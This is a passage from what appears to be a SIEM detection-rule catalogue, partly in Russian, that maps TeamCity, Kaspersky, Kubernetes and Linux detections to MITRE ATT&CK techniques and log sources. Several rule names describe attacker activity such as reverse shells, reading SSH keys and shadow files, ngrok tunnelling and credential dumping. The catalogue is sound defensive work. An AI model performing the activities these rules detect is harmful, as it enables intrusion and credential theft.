| Internet Systems Consortium | BIND | RV-D-730 | DNS query to a localtonet domain detected | TA0011 (Command and Control) | T1572 (Protocol Tunneling) | queries.log |
| JetBrains | TeamCity | RV-D-69 | Exploitation of a JetBrains TeamCity vulnerability - CVE-2024-27198 | TA0004 (Privilege Escalation), TA0005 (Defense Evasion), TA0003 (Persistence), TA0001 (Initial Access) | T1068 (Exploitation for Privilege Escalation), T1134 (Access Token Manipulation), T1134.003 (Access Token Manipulation: Make and Impersonate Token), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution), T1212 (Exploitation for Credential Access) | access.log |
| JetBrains | TeamCity | RV-D-551 | Privileged user login to TeamCity from an unknown host | TA0001 (Initial Access) | T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts) | teamcity-auth.log |
| JetBrains | TeamCity | RV-D-552 | Successful password guessing against JetBrains TeamCity | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | teamcity-server.log, teamcity-auth.log |
| JetBrains | TeamCity | RV-D-553 | Password guessing against JetBrains TeamCity | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | teamcity-server.log |
| JetBrains | TeamCity | RV-D-554 | TeamCity authorization token obtained | TA0003 (Persistence), TA0006 (Credential Access) | T1528 (Steal Application Access Token) | teamcity-activities.log |
| JetBrains | TeamCity | RV-D-555 | TeamCity plugin uploaded | TA0003 (Persistence), TA0004 (Privilege Escalation) | T1195 (Supply Chain Compromise), T1195.001 (Supply Chain Compromise: Compromise Software Dependencies and Development Tools), T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), T1505 (Server Software Component: Web Shell) | teamcity-server.log |
| JetBrains | TeamCity | RV-D-556 | TeamCity account created | TA0003 (Persistence) | T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account) | teamcity-server.log |
| JetBrains | TeamCity | RV-D-557 | Group membership or role changed | TA0003 (Persistence), TA0004 (Privilege Escalation) | T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups) | teamcity-activities.log |
| JetBrains | TeamCity | RV-D-558 | Remote command execution capability enabled | TA0002 (Execution), TA0004 (Privilege Escalation), TA0011 (Command and Control) | T1059 (Command and Scripting Interpreter), T1068 (Exploitation for Privilege Escalation), T1102 (Web Service), T1102.002 (Web Service: Bidirectional Communication), T1190 (Exploit Public-Facing Application) | access.log |
| JetBrains | TeamCity | RV-D-559 | Build configuration changed under a suspicious account | TA0008 (Lateral Movement) | T1021 (Remote Services) | teamcity-activities.log |
| JetBrains | TeamCity | RV-D-658 | Exploitation of CVE-2023-42793 in JetBrains TeamCity | TA0002 (Execution), TA0004 (Privilege Escalation) | T1068 (Exploitation for Privilege Escalation), T1134 (Access Token Manipulation), T1134.003 (Access Token Manipulation: Make and Impersonate Token), T1190 (Exploit Public-Facing Application), T1195 (Supply Chain Compromise), T1195.001 (Supply Chain Compromise: Compromise Software Dependencies and Development Tools), T1210 (Exploitation of Remote Services), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning) | |

access.log

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-664

Вредоносное вложение в письме

TA0001 (Initial Access), TA0043 (Reconnaissance)

T1534 (Internal Spearphishing), T1566 (Phishing), T1566.001 (Phishing: Spearphishing Attachment), T1566.002 (Phishing: Spearphishing Link), T1598 (Phishing for Information), T1598.002 (Phishing for Information: Spearphishing Attachment)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_PART_RESULT, LMS_EV_SCAN_LOGIC_AV_STATUS)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-665

Вредоносная ссылка в письме

TA0001 (Initial Access)

T1189 (Drive-by Compromise), T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1566 (Phishing), T1566.002 (Phishing: Spearphishing Link), T1598 (Phishing for Information), T1598.003 (Phishing for Information: Spearphishing Link)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_URL)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-666

Проверка подлинности отправителя сообщений

TA0001 (Initial Access)

T1534 (Internal Spearphishing), T1566 (Phishing), T1598 (Phishing for Information)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_PART_RESULT)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-667

Получение массовой рассылки писем

TA0001 (Initial Access)

T1566 (Phishing), T1598 (Phishing for Information), T1667 (Email Bombing)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_AS_STATUS)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-668

Получение спам-письма

TA0001 (Initial Access)

T1566 (Phishing), T1598 (Phishing for Information)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_AS_STATUS)

Kaspersky

Kaspersky Secure Mail Gateway

RV-D-669

Шифрованное вложение в письме

TA0001 (Initial Access)

T1027 (Obfuscated Files or Information), T1534 (Internal Spearphishing), T1566 (Phishing), T1566.001 (Phishing: Spearphishing Attachment), T1598 (Phishing for Information), T1598.002 (Phishing for Information: Spearphishing Attachment)

Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_PART_RESULT, LMS_EV_SCAN_LOGIC_AV_STATUS)

Kaspersky

Kaspersky Security Center

RV-DD-1

Успешное исполнение задачи на удаленную установку программы средствами KSC через установочные пакеты

TA0002 (Execution), TA0008 (Lateral Movement)

T1072 (Software Deployment Tools), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLPRCI_TaskState, KLNAG_EV_INV_APP_INSTALLED, KLAUD_EV_OBJECTMODIFY)

Kaspersky

Kaspersky Security Center

RV-D-83

Критичная политика была изменена Kaspersky

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY)

Kaspersky

Kaspersky Security Center

RV-D-84

Повторное заражение хоста одним вирусом

TA0008 (Lateral Movement), TA0002 (Execution)

T1080 (Taint Shared Content), T1204 (User Execution), T1204.002 (User Execution: Malicious File), T1204.003 (User Execution: Malicious Image), T1210 (Exploitation of Remote Services)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND)

Kaspersky

Kaspersky Security Center

RV-D-85

Устройство перемещено в группу администрирования на сервере KSC

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_ADMGROUP_CHANGED)

Kaspersky

Kaspersky Security Center

RV-D-86

Зафиксировано отключение задачи средств AV-защиты Kaspersky

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (EventID_000000de)

Kaspersky

Kaspersky Security Center

RV-D-87

На сервере KSC созданы пакет установки и удаленная задача на установку пакета

TA0002 (Execution), TA0008 (Lateral Movement)

T1072 (Software Deployment Tools), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY)

Kaspersky

Kaspersky Security Center

RV-D-89

Изменение политик администрирования на сервере KSC

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY)

Kaspersky

Kaspersky Security Center

RV-D-90

Отключение продукта Kaspersky в результате выполнения задачи

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLPRCI_TaskState)

Kaspersky

Kaspersky Security Center

RV-D-91

Отключение компонентов защиты продуктов Kaspersky

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (EventID_000000d6)

Kaspersky

Kaspersky Security Center

RV-D-92

Создание и исполнение задачи на удаленную деинсталляцию программы средствами KSC

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY, KLAUD_EV_TASK_STATE_CHANGED)

Kaspersky

Kaspersky Security Center

RV-D-93

Успешное исполнение задачи на удаленную установку программы средствами KSC

TA0005 (Defense Evasion), TA0002 (Execution), TA0008 (Lateral Movement)

T1072 (Software Deployment Tools), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLPRCI_TaskState, KLNAG_EV_INV_APP_INSTALLED)

Kaspersky

Kaspersky Security Center

RV-D-94

Зафиксирован переход по опасной ссылке

TA0002 (Execution), TA0043 (Reconnaissance)

T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1598 (Phishing for Information), T1598.003 (Phishing for Information: Spearphishing Link), T1608 (Stage Capabilities), T1608.005 (Stage Capabilities: Link Target)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND_AND_REPORTED, GNRL_EV_VIRUS_FOUND_AND_BLOCKED)

Kaspersky

Kaspersky Security Center

RV-D-95

Множество хостов заражены одним типом ВПО

TA0042 (Resource Development)

T1608 (Stage Capabilities), T1608.001 (Stage Capabilities: Upload Malware)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND, GNRL_EV_VIRUS_FOUND_BY_KSN)

Kaspersky

Kaspersky Security Center

RV-D-96

Множественное срабатывание вердиктов средств AV-защиты на одном хосте

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND, GNRL_EV_VIRUS_FOUND_BY_KSN)

Kaspersky

Kaspersky Security Center

RV-D-97

Зафиксирована сетевая атака

TA0043 (Reconnaissance)

T1595 (Active Scanning), T1595.001 (Active Scanning: Scanning IP Blocks)

Kaspersky Security Center (GNRL_EV_ATTACK_DETECTED)

Kaspersky

Kaspersky Security Center

RV-D-98

Зафиксированы устаревшие базы антивирусного ПО Kaspersky

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (EventID_000000cf, EventID_000000d0)

Kaspersky

Kaspersky Security Center

RV-D-99

Включение учетной записи пользователя на сервере KSC

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

Kaspersky Security Center (KLAUD_EV_OBJECTPROPMODIFIED)

Kaspersky

Kaspersky Security Center

RV-D-100

Было удалено обнаруженное средствами AV-защиты ВПО

TA0042 (Resource Development)

T1608 (Stage Capabilities), T1608.001 (Stage Capabilities: Upload Malware)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND, GNRL_EV_VIRUS_FOUND_BY_KSN, GNRL_EV_OBJECT_DELETED, GNRL_EV_OBJECT_CURED, GNRL_EV_OBJECT_BLOCKED)

Kaspersky

Kaspersky Security Center

RV-D-101

Не было удалено обнаруженное средствами AV-защиты ВПО

TA0042 (Resource Development)

T1608 (Stage Capabilities), T1608.001 (Stage Capabilities: Upload Malware)

Kaspersky Security Center (GNRL_EV_VIRUS_FOUND_BY_KSN, GNRL_EV_VIRUS_FOUND, GNRL_EV_OBJECT_NOTCURED, GNRL_EV_OBJECT_REPORTED, EventID_00000139, EventID_000009fc)

Kaspersky

Kaspersky Security Center

RV-D-688

Подключение недоверенного устройства

TA0001 (Initial Access), TA0008 (Lateral Movement), TA0011 (Command and Control)

T1091 (Replication Through Removable Media), T1219 (Remote Access Tools), T1219.003 (Remote Access Tools: Remote Access Hardware)

Kaspersky Endpoint Security (GNRL_EV_DEVCTRL_DEV_PLUG_DENIED)

Kaspersky

Kaspersky Security Center

RV-D-766

Устройство давно не подключалось к серверу KSC

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLSRV_HOST_STATUS_CRITICAL)

Kubernetes

Kubernetes

RV-D-102

Изменение файлов helm

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1543 (Create or Modify System Process), T1543.005 (Create or Modify System Process: Container Service)

Auditd

Kubernetes

Kubernetes

RV-D-103

Привязка стандартных административных ролей k8s

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)

audit.log

Kubernetes

Kubernetes

RV-D-104

Добавление кластерных ролей k8s

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)

audit.log

Kubernetes

Kubernetes

RV-D-105

Удаление роли k8s

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)

audit.log

Kubernetes

Kubernetes

RV-D-106

Добавление ролей k8s

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)

audit.log

Kubernetes

Kubernetes

RV-D-510

Анонимный доступ к секретам k8s

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.007 (Unsecured Credentials: Container API)

audit.log

Kubernetes

Kubernetes

RV-D-576

Изменение стандартов безопасности pod

TA0005 (Defense Evasion)

T1562 (Impair Defenses)

audit.log

Kubernetes

Kubernetes

RV-D-577

Создание static pods

TA0003 (Persistence)

T1543 (Create or Modify System Process), T1543.005 (Create or Modify System Process: Container Service)

audit.log

Kubernetes

Kubernetes

RV-D-637

Создание сервисного аккаунта k8s

TA0003 (Persistence)

T1136 (Create Account), T1136.001 (Create Account: Local Account)

audit.log

Kubernetes

Kubernetes

RV-D-641

Неуспешный запрос от сервисного аккаунта k8s

TA0007 (Discovery)

T1613 (Container and Resource Discovery)

audit.log

Kubernetes

Kubernetes

RV-D-642

Создание или изменение службы NodePort

TA0003 (Persistence)

T1133 (External Remote Services)

audit.log

Kubernetes

Kubernetes

RV-D-645

Поиск разрешений сервисным аккаунтом k8s

TA0007 (Discovery)

T1069 (Permission Groups Discovery)

audit.log

Kubernetes

Kubernetes

RV-D-646

Поиск секретов k8s

TA0007 (Discovery)

T1613 (Container and Resource Discovery)

audit.log

Kubernetes

Kubernetes

RV-D-649

Запуск интерактивной оболочки в контейнере

TA0002 (Execution)

T1552 (Unsecured Credentials), T1552.007 (Unsecured Credentials: Container API), T1609 (Container Administration Command)

audit.log

Kubernetes

Kubernetes

RV-D-751

Создание привилегированного пода k8s

TA0004 (Privilege Escalation)

T1610 (Deploy Container), T1611 (Escape to Host)

audit.log

Kubernetes

Kubernetes

RV-D-752

Создание контейнера с Linux Capabilities

TA0004 (Privilege Escalation)

T1610 (Deploy Container), T1611 (Escape to Host)

audit.log

Kubernetes

Kubernetes

RV-D-757

Назначение сервисного аккаунта контейнеру в kube-system

TA0004 (Privilege Escalation)

T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1098 (Account Manipulation)

audit.log

Linux

RV-D-107

Использование утилит для создания снимков экрана Linux

TA0009 (Collection)

T1113 (Screen Capture)

Auditd

Linux

RV-D-108

Загрузка файлов с удаленных ресурсов при помощи стандартных утилит

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Auditd

Linux

RV-D-109

Туннелирование с использованием ngrok в Linux

TA0011 (Command and Control)

T1090 (Proxy), T1090.002 (Proxy: External Proxy)

Auditd

Linux

RV-D-110

Загрузка файлов утилитой wget в директорию tmp

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

R-Point

Linux

RV-D-111

Чтение файлов с историей команд

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.003 (Unsecured Credentials: Bash History)

Auditd

Linux

RV-D-112

Чтение файлов с пользовательскими учетными данными

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.008 (OS Credential Dumping: /etc/passwd and /etc/shadow), T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files)

Auditd

Linux

RV-D-114

Подбор пароля на хосте Linux

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Auditd, auth.log, secure

Linux

RV-D-115

Успешный подбор пароля на хосте Linux

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)

Auditd, auth.log, secure

Linux

RV-D-116

Дамп памяти утилитой MimiPenguin на Linux

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.007 (OS Credential Dumping: Proc Filesystem), T1003.008 (OS Credential Dumping: /etc/passwd and /etc/shadow)

Auditd

Linux

RV-D-117

Вызов команды из модуля PAM

TA0006 (Credential Access), TA0005 (Defense Evasion), TA0003 (Persistence)

T1556 (Modify Authentication Process), T1556.003 (Modify Authentication Process: Pluggable Authentication Modules)

R-Point

Linux

RV-D-118

Чтение файлов с закрытыми ключами SSH

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.004 (Unsecured Credentials: Private Keys)

Auditd

Linux

RV-D-119

Чтение памяти процессов на Linux

TA0006 (Credential Access), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1003 (OS Credential Dumping), T1003.007 (OS Credential Dumping: Proc Filesystem), T1055 (Process Injection), T1055.009 (Process Injection: Proc Memory)

Auditd

Linux

RV-D-120

Доступ к критичным файлам SSSD

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.005 (OS Credential Dumping: Cached Domain Credentials), T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1558 (Steal or Forge Kerberos Tickets)

Auditd

Linux

RV-D-121

Подбор пароля пользователя Linux

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Auditd, auth.log, secure

Linux

RV-D-122

Успешный подбор пароля пользователя Linux

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Auditd, auth.log, secure

Linux

RV-D-123

Удаление файлов логирования в Linux

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs), T1070.003 (Indicator Removal: Clear Command History)

Auditd

Linux

RV-D-124

Загрузка подозрительного ebpf модуля

TA0005 (Defense Evasion)

T1014 (Rootkit)

Auditd

Linux

RV-D-125

Изменение конфигурационных файлов службы firewalld

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.004 (Impair Defenses: Disable or Modify System Firewall)

Auditd

Linux

RV-D-126

Изменение критичных файлов конфигурации интерактивной оболочки

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.003 (Indicator Removal: Clear Command History), T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification), T1562.003 (Impair Defenses: Impair Command History Logging)

Auditd

Linux

RV-D-127

Изменение конфигурационных файлов служб журналирования

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations), T1562 (Impair Defenses), T1562.006 (Impair Defenses: Indicator Blocking), T1562.012 (Impair Defenses: Disable or Modify Linux Audit System)

Auditd

Linux

RV-D-128

Копирование стандартных исполняемых файлов (маскарадинг утилит)

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.003 (Masquerading: Rename Legitimate Utilities)

Auditd

Linux

RV-D-129

Отключение или модификация Syslog Linux

TA0005 (Defense Evasion)

T1562.006 (Impair Defenses: Indicator Blocking)

Auditd

Linux

RV-D-130

Отключение службы firewalld

TA0005 (Defense Evasion)

T1562.004 (Impair Defenses: Disable or Modify System Firewall)

Auditd

Linux

RV-D-131

Отключение или изменение службы SELinux

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Auditd

Linux

RV-D-132

Изменение привилегий файлов Linux

TA0005 (Defense Evasion)

T1222 (File and Directory Permissions Modification), T1222.002 (File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification)

Auditd

Linux

RV-D-133

Создание/изменение скрытых файлов Linux

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Auditd

Linux

RV-D-134

Создание/изменение скрытых shared object файлов

TA0005 (Defense Evasion)

T1129 (Shared Modules), T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Auditd

Linux

RV-D-135

Загрузка кода в процесс Linux

TA0005 (Defense Evasion)

T1620 (Reflective Code Loading)

Auditd

Linux

RV-D-136

Изменение корневых сертификатов Linux

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.004 (Subvert Trust Controls: Install Root Certificate)

Auditd

Linux

RV-D-137

Изменение tmp файлов логирования Linux

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs)

Auditd

Linux

RV-D-138

Большое количество подозрительных команд

TA0007 (Discovery)

T1016 (System Network Configuration Discovery), T1057 (Process Discovery), T1082 (System Information Discovery), T1518 (Software Discovery)

Auditd

Linux

RV-D-139

Получение информации о текущем пользователе

TA0007 (Discovery)

T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account)

Auditd

Linux

RV-D-140

Разведка доменных УЗ в Linux

TA0007 (Discovery)

T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account)

Auditd

Linux

RV-D-141

Разведка локальных УЗ в Linux

TA0007 (Discovery)

T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account)

Auditd

Linux

RV-D-142

Разведка установленного ПО в Linux

TA0007 (Discovery)

T1518 (Software Discovery), T1518.001 (Software Discovery: Security Software Discovery), T1592 (Gather Victim Host Information), T1592.002 (Gather Victim Host Information: Software)

Auditd

Linux

RV-D-143

Поиск локализации системы Linux

TA0007 (Discovery)

T1614 (System Location Discovery), T1614.001 (System Location Discovery: System Language Discovery)

Auditd

Linux

RV-D-144

Поиск сетевых конфигураций

TA0007 (Discovery)

T1016 (System Network Configuration Discovery), T1016.001 (System Network Configuration Discovery: Internet Connection Discovery), T1590 (Gather Victim Network Information)

Auditd

Linux

RV-D-145

Разведка парольной политики в Linux

TA0007 (Discovery)

T1201 (Password Policy Discovery)

Auditd

Linux

RV-D-146

Разведка запущенных процессов в Linux

TA0007 (Discovery)

T1057 (Process Discovery)

Auditd

Linux

RV-D-147

Поиск окружения контейнера через proc VFS

TA0007 (Discovery)

T1082 (System Information Discovery)

R-Point

Linux

RV-D-148

Попытка обнаружения контейнеров через Inodes Listing

TA0007 (Discovery)

T1082 (System Information Discovery)

R-Point

Linux

RV-D-149

Использование сетевых утилит Linux для сканирования сети

TA0007 (Discovery), TA0043 (Reconnaissance)

T1046 (Network Service Discovery), T1595 (Active Scanning), T1595.001 (Active Scanning: Scanning IP Blocks)

Auditd

Linux

RV-D-150

Разведка Docker контейнеров через Dockerenv

TA0007 (Discovery)

T1082 (System Information Discovery)

R-Point

Linux

RV-D-151

Поиск файлов с suid/sgid битом

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid)

Auditd

Linux

RV-D-152

Подозрительное чтение домашней директории пользователя

TA0007 (Discovery)

T1083 (File and Directory Discovery)

Auditd

Linux

RV-D-153

Разведка системной информации Linux

TA0043 (Reconnaissance)

T1082 (System Information Discovery), T1592 (Gather Victim Host Information), T1592.004 (Gather Victim Host Information: Client Configurations)

Auditd

Linux

RV-D-154

Получена информация о системных службах на узле

TA0007 (Discovery)

T1007 (System Service Discovery)

Auditd

Linux

RV-D-155

Эксплуатация уязвимости CVE-2023-46944 в расширении GitLens для VSCode на Linux

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

Auditd

Linux

RV-D-156

Создание интерактивной оболочки через GTFOBins

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.011 (Command and Scripting Interpreter: Lua), T1218 (System Binary Proxy Execution)

Auditd

Linux

RV-D-157

Сетевое обращение от подозрительного скрипта в Linux

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1204 (User Execution), T1204.002 (User Execution: Malicious File)

Auditd

Linux

RV-D-158

Создание подозрительного Named Pipe с помощью Mkfifo

TA0002 (Execution)

T1559 (Inter-Process Communication)

R-Point

Linux

RV-D-159

Reverse-shell через Bash-сценарий

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell)

Auditd

Linux

RV-D-160

Создан Reverse-shell сторонней утилитой в Linux

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python)

Auditd

Linux

RV-D-161

Использование хакерской утилиты в Linux

TA0042 (Resource Development)

T1587 (Develop Capabilities)

Auditd

Linux

RV-D-162

Остановка критичных сервисов в Linux

TA0040 (Impact)

T1489 (Service Stop)

Auditd

Linux

RV-D-163

Загрузка файла с помощью утилит GTFOBins

TA0008 (Lateral Movement)

T1570 (Lateral Tool Transfer)

Auditd

Linux

RV-D-164

Создание туннелей и перенаправление трафика

TA0008 (Lateral Movement), TA0011 (Command and Control)

T1021 (Remote Services), T1021.004 (Remote Services: SSH), T1572 (Protocol Tunneling)

Auditd

Linux

RV-D-165

Загрузка файла сервисной учетной записью

TA0008 (Lateral Movement)

T1570 (Lateral Tool Transfer)

Auditd

Linux

RV-D-166

Разведка под сервисным пользователем

TA0007 (Discovery)

T1016 (System Network Configuration Discovery), T1046 (Network Service Discovery), T1082 (System Information Discovery), T1087 (Account Discovery), T1570 (Lateral Tool Transfer)

Auditd

Linux

RV-D-167

Изменение настроек пользователя

TA0003 (Persistence), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching), T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)

R-Point

Linux

RV-D-168

Создание и удаление уз в короткий период времени

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)

Auditd, auth.log, secure

Linux

RV-D-169

Изменение критичных файлов Linux

TA0006 (Credential Access), TA0005 (Defense Evasion), TA0003 (Persistence)

T1037 (Boot or Logon Initialization Scripts), T1037.004 (Boot or Logon Initialization Scripts: RC Scripts), T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs), T1098 (Account Manipulation), T1098.004 (Account Manipulation: SSH Authorized Keys), T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification), T1556 (Modify Authentication Process), T1556.003 (Modify Authentication Process: Pluggable Authentication Modules), T1562.012 (Impair Defenses: Disable or Modify Linux Audit System), T1574 (Hijack Execution Flow), T1574.006 (Hijack Execution Flow: Dynamic Linker Hijacking)

Auditd

Linux

RV-D-170

Изменение задач cron

TA0003 (Persistence)

T1053 (Scheduled Task/Job), T1053.003 (Scheduled Task/Job: Cron)

Auditd

Linux

RV-D-171

Закрепление при помощи утилиты Trap

TA0004 (Privilege Escalation), TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.005 (Event Triggered Execution: Trap)

Auditd

Linux

RV-D-172

Добавление/удаление модулей ядра Linux

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1014 (Rootkit), T1547 (Boot or Logon Autostart Execution), T1547.006 (Boot or Logon Autostart Execution: Kernel Modules and Extensions)

Auditd

Linux

RV-D-173

Изменение библиотеки liblzma

TA0003 (Persistence)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1554 (Compromise Host Software Binary), T1556 (Modify Authentication Process)

Auditd

Linux

RV-D-175

Модификация правил udev

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1546 (Event Triggered Execution), T1546.017 (Event Triggered Execution: Udev Rules)

Auditd

Linux

RV-D-176

Создание пользователя или группы

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)

auth.log, Auditd, secure

Linux

RV-D-177

Закрепление в системе с использованием записей автозагрузки XDG

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.013 (Boot or Logon Autostart Execution: XDG Autostart Entries)

Auditd

Linux

RV-D-178

Создание/изменение правила nf_tables

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1068 (Exploitation for Privilege Escalation), T1562.004 (Impair Defenses: Disable or Modify System Firewall)

Auditd

Linux

RV-D-179

Повышение привилегий при помощи pkexec

TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation)

Auditd

Linux

RV-D-180

Внедрение процесса в другой через ptrace

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1055 (Process Injection), T1055.008 (Process Injection: Ptrace System Calls)

Auditd

Linux

RV-D-181

Повышение привилегий до root

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation), T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts), T1098 (Account Manipulation)

R-Point

Linux

RV-D-480

Использование утилиты SSHuttle для создания SSH-туннеля

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Auditd

Linux

RV-D-481

Создание файла через Python/Ruby сценарий

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.006 (Command and Scripting Interpreter: Python)

Auditd

Linux

RV-D-483

Злоупотребление сырыми сокетами

TA0011 (Command and Control)

T1095 (Non-Application Layer Protocol)

Auditd

Linux

RV-D-484

